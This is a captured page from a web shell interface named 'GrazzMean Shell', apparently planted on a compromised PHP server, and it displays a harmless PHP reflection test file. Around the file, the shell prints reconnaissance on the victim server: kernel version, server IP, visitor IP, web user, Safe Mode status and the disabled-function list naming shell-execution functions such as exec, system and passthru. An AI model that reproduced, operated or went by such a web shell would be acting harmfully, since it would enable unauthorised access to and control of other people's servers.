shell bypass 403

GrazzMean Shell

: /www/server/php/72/src/ext/reflection/tests/ [ drwxrwxr-x ]
Uname: Linux yisu-647059427c03a 3.10.0-862.14.4.el7.x86_64 #1 SMP Wed Sep 26 15:12:11 UTC 2018 x86_64
Software: nginx/1.22.1
PHP version: 7.3.31 [ PHP INFO ] PHP os: Linux
Server Ip: 103.146.158.90
Your Ip: 216.73.216.122
User: www (1000) | Group: www (1000)
Safe Mode: OFF
Disable Function:
passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv

name : ReflectionClass_getModifiers_basic.phpt
--TEST--
ReflectionClass::getModifiers()
--CREDITS--
Felix De Vliegher <felix.devliegher@gmail.com>
--FILE--
<?php

class a {}
abstract class b {}
final class c {}
interface d {}
class e implements d {}
interface f extends d {}
class g extends b {}

function dump_modifiers($class) {
	$obj = new ReflectionClass($class);
	var_dump($obj->getModifiers());
}

dump_modifiers('a');
dump_modifiers('b');
dump_modifiers('c');
dump_modifiers('d');
dump_modifiers('e');
dump_modifiers('f');
dump_modifiers('g');

?>
--EXPECT--
int(0)
int(32)
int(4)
int(0)
int(0)
int(0)
int(0)
© 2026 GrazzMean
AI导航